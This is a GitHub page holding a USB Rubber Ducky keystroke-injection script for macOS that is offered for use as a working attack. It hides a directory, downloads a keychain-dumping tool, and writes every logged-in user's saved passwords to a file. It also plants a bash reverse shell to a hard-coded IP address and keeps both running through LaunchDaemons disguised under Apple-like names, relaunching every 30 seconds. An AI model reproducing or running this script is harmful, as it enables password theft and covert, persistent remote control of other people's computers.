forked from IsaiahJTurner/duckdump
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdump.DUCKY
executable file
·126 lines (120 loc) · 2.57 KB
/
dump.DUCKY
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login.
DELAY 100
STRING mount -uw /
ENTER
DELAY 100
STRING mkdir /Library/.hidden
ENTER
DELAY 100
STRING echo '#!/bin/sh
ENTER
STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/Rainierraoul/duckdump/master/keydumper'
ENTER
STRING chmod +x /Library/.hidden/keychaindump
ENTER
STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc
ENTER
STRING do
ENTER
STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2)
ENTER
STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt
ENTER
STRING done' > /Library/.hidden/dump.sh
ENTER
DELAY 100
STRING chmod +x /Library/.hidden/dump.sh
ENTER
DELAY 100
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/120.149.4.142/1989 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 100
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 100
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 100
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/dump.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 100
STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 100
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.remoteservices</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>30</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.remoteservices.plist
ENTER
DELAY 100
STRING chmod 600 /Library/LaunchDaemons/com.apples.remoteservices.plist
ENTER
DELAY 100
STRING launchctl load /Library/LaunchDaemons/com.apples.remoteservices.plist
ENTER
DELAY 100
STRING shutdown -r now
ENTER